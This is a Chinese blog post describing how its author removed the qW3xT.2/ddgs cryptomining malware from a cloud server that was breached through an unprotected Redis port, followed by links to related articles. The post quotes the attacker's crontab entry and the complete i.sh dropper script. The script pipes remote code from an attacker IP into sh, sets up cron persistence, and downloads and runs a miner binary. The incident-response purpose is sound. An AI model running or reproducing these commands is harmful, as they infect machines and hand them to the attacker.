qW3xT.2,解决挖矿病毒。

最新推荐文章于 2025-02-17 14:14:47 发布
最新推荐文章于 2025-02-17 14:14:47 发布
阅读量1w 收藏 9
点赞数 5
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_41228949/article/details/81501753
本文详细介绍了一次在阿里云服务器上遭遇挖矿病毒的经历,包括病毒如何利用未设密码的Redis端口入侵,以及逐步清除病毒的具体步骤,涉及设置Redis密码、删除病毒文件、终止恶意进程和清除计划任务。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。

在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安全事件。建议登录云盾-态势感知控制台查看详情和处理。

于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。

在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。

解决办法:

1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

2、进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3xT.2该进程,但是一段时间之后,发现该行程又重新启动。

肯定是有守护进程,观察top命令下的进程,发现一个可疑的进行

3、在/tmp文件夹下发现该进程的文件 ls /tmp

发现qW3xT.2文件又重新生成了。这时,首先删除qW3xT.2文件和ddgs.3013文件,然后使用top查询qW3xT.2和ddgs.3013的pid,直接kill掉。

4、一段时间之后,删除的文件重新生成,dds和挖矿的进程又重新执行。此时怀疑是否有计划任务,此时查看计划任务的列表

[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

删除计划任务 crontab -r

curl 的这几个 optional 介绍,我也是百度的
-f  - fail在HTTP错误(H)上静默失败(根本没有输出)
-s  -silent静音模式。 不要输出任何东西
      --socks4 HOST [:PORT]给定主机+端口上的SOCKS4代理
      --socks4a HOST [:PORT]给定主机+端口上的SOCKS4a代理
      --socks5 HOST [:PORT]给定主机+端口上的SOCKS5代理
      --socks5-hostname HOST [:PORT] SOCKS5代理,将主机名传递给代理
      --socks5-gssapi-service名称为gssapi的SOCKS5代理服务名称
      --socks5-gssapi-nec与NEC SOCKS5服务器的兼容性
-S   --show-error显示错误。 使用-s时,make curl会在出现错误时显示错误
-L   --location遵循重定向(H)
      --location-trusted like --location并将auth发送给其他主机(H)
 

此时计划任务已经删除。详细信息查看https://juejin.im/post/5b62b975f265da0f9628a820

计划任务删除完成之后,这个13又开始运行。太顽固了。

 

于是我又看计划任务的内容,是否是有东西没有删除干净。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
 

发现计划任务在服务器中创建了几个文件,

/var/spool/cron/crontabs/root

/var/spool/cron/root

内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同)

将计划任务中创建的文件删除。

最终,这个挖矿病毒终于删除完成

 

 

昵称1992
关注
解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)
墨痕诉清风的博客
05-15 7648
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安全事件。建议登录云盾-态势感知控制台查看详情和处理。于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。解决办法:1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。
网络安全从入门到精通(特别篇IV):应急响应之挖矿病毒处置流程
HACKONE的博客
04-10 225
应急响应Linux应急响应之挖矿病毒处置流程 Linux应急响应之挖矿病毒处置流程
清除wnTKYg 这个挖矿工木马的过程讲述
qq_35562664的博客
11-23 358
转载注明出处:http://blog.sina.com.cn/pastlifezhangchilde  杀wnTKYg病毒分两步,第一是找到它的来源,切断入口,第二步,找到它的守护进程并杀死,然后再去杀死病毒进程,有的守护进程很隐蔽,唤醒病毒之后,自动消亡,这时候top就看不到了,要留心。      由于工作需要,我由一个专业java开发工程师,渐渐的也成为了不专业的资深的
Emm,qW3xT.2(矿机进程)
weixin_33881050的博客
08-02 184
emmm,长话短说,阿里云服务器被挂矿机了。 背景 事情还得从两三天前说起。7-31阿里云给我发了一个短信。 我还专门和朋友谈(chao)论(feng)Root被提权是什么鬼逻辑,然后就没理。。因为服务器是自己玩的用,开发阶段给前端暴露api用的,没什么重要的数据。然后: 这个短信又发生在8-2号,What,大男子主义上来了,觉得这13有点过分了,有点变本加厉的意思了,然后就说去看看。(当...
处理阿里云服务器异常进程qW3xT.2
Bob's Blog
08-10 601
这个问题是由于Redis端口导致的。 1️⃣修改redis端口和密码 因为最开始没有设置密码,所以首先修改redis.conf。设置密码和redis默认端口 ,然后重启redis ①whereis redis.conf ②vim redis.conf ③kill redis pid ④src/redis-server redis.conf 2️⃣处理qW3xT 找到qW3xT....
qW3xT.2服务器矿工病毒
qq_38872310的博客
08-01 1154
我遇到的是一款qW3xT.2病毒,网上查了一下,好像是挖矿病毒。在此贴一下我找到的关于病毒的资料。这是我的服务器 这篇文章可谓是出自高手之笔,感觉说的很厉害,但是非专业人士的我有点看不懂,看个大概   https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/ 还有就是下面这篇文章,比较早,但是遇到的是同类问...
记一次解决服务器病毒qW3xT.2经历
Moli_张的博客
08-13 869
先是在服务器出现警告,说可能是挖矿病毒。刚开始没当回事,当把这个病毒百度之后发现,很严重呐。 好了,开始干活。 第一步: 链接地址 :https://blog.csdn.net/weixin_41228949/article/details/81501753 然鹅,没有成功。。。。。。(成功了大概半分钟,之后又活了)呵呵呵 第二步: 找出入侵IP /var/spool/cron/c...
centos7系统服务器 ---- kworkerds挖矿病毒排查过程
跪下叫我怕怕的博客
03-04 8317
kworkerds挖矿病毒排查过程 2019年32日晚上,收到报警邮件,出现多台服务器cpu使用率超过百分之九十五现象。登录服务器查看,发现存在cpu使用率超高的进程kworkerds 的存在,不用多说,这个名字只要是接触过挖矿病毒的运维人员都知道,那么下面开始排查及清理。 中了此病毒的服务器有两种(目前发现)情况: 第一种,使用top命令可以直接查看到是哪个进程在消耗CPU资源; 第二种,使用...
kdevtmpfsi挖矿病毒解决过程
weixin_43233341的博客
03-03 3024
top 开始cpu消耗在百分80左右,有时会达到99,杀掉进程后几分钟又跳出来, 开始的升级阿里云的高级版,一键查杀,cpu瞬间降到20 继续跟踪。。。 大概两个小时后发现,kdevtmpfsi进程会时不时跳出来,一两秒钟后又自动关闭,此时cpu 再百分20到百分40直接上下波动,如图(正常情况下是稳得) 解决方法 kdevtmpfsi有守护进程。守护进程名称为 kinsing,需要kill后才...
记录linux zigw挖矿病毒查杀
guanzhengyinqin的博客
01-27 1476
关于此病毒的参考文献: https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757GtnJxj&cat=6270 病毒介绍 https://yq.aliyun.com/articles/657476 病毒清理,不过有时会复发 https://blog.csdn.net/sayWhat_sayHello/...
清除qW3xT.2 这个挖矿工木马的过程
Guodong_Wei123的博客
07-31 990
我遇到的是qW3xT.2病毒 按照下面的方法也解决了 原文地址: http://blog.sina.com.cn/s/blog_c08907b10102wyyl.html   杀wnTKYg病毒分两步,第一是找到它的来源,切断入口,第二步,找到它的守护进程并杀死,然后再去杀死病毒进程,有的守护进程很隐蔽,唤醒病毒之后,自动消亡,这时候top就看不到了,要留心。      由于工作需要,...
挖矿病毒常见处置方法
weixin_46597076的博客
02-24 5306
挖矿病毒特征:“挖矿病毒是一段恶意代码或者一个软件,一般利用主机或者操作系统的高危漏洞术在局域网内传播,控制电脑进行大量的计算机运算来获取虚拟货币。该病毒会消耗大量的计算机处理资源,常见的就是系统中毒后系统CPU占用接近100%、系统卡顿执行基本命令响应缓慢、系统出现异常进程无法正常kill、系统内存异常占用不稳定等。常见攻击方式:不明邮件附件、文件、连接和网页、不明U盘随意接入、非官方软件和服务器弱口令、高危端口暴露等事件大概处置流程:详细流程、操作命令。
应急响应-Windows-挖矿病毒
Sgirll的博客
05-14 1756
随着虚拟货币市场的繁荣,挖矿病毒已成为网络安全领域一大挑战。该类病毒利用计算机资源进行加密货币的挖掘,给个人用户和企业网络带来了严重的安全风险。本文将针对挖矿病毒的应急响应和防范措施进行分析和总结。
2025版】最新手把手病毒分析 挖矿病毒处置总结,从零基础到精通,收藏这篇就够了!
wananxuexihu的博客
02-17 2633
我们是_
服务器挖矿病毒怎么解决
m0_70754056的博客
07-14 2056
挖矿病毒是指通过利用计算机的计算资源进行加密货币挖掘的恶意软件。它能够隐藏在云服务器中,从而利用服务器的计算资源来进行挖矿。这样的病毒不仅会损害您的服务器,而且还会缩短其使用寿命和性能。今天,我们将向您介绍如何彻底清除云服务器上的挖矿病毒
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 7184
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
服务器中挖矿病毒kinsing的临时处理方法
企业数字化转型卫淼全栈技术工作室
06-02 1206
ps -aux | grep kinsing病毒名,查找病毒进程,然后杀死进程,如果杀死后,还会生成,那就查计划任务是否也被篡改了,crontab -l命令查看当前登录的用户计划任务,如果有异常的计划任务,那么就使用crontab -r命令删除所有的计划任务,删除ssh无密登录的秘钥(cd ~/.ssh )。一般解决kinsing病毒的方法,是top c 查100%的进程,并获取进程pid,然后使用。服务器中挖矿病毒,非常郁闷,删了还继续,最后使用了两种方式,暂时解决病毒问题。3、服务器漏洞升级、打补丁。
四元数 qw =0.7766305208, qx =0.6278496385, qy =-0.0522651002,qz =0.0127130812与四元数 qw = 0.77641159,qx=0.62792599,qy = -0.052271456,qz = 0.012714626 误差相差多少,是否对pose有影响
最新发布
07-14
注意:单位四元数满足 qw^2 + qx^2 + qy^2 + qz^2 = 1。 步骤: 1. 将两个四元数归一化(确保它们是单位四元数)。但给定的四元数看起来已经是归一化的(因为它们的模长接近1),但我们还是先计算模长确认。 2....
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值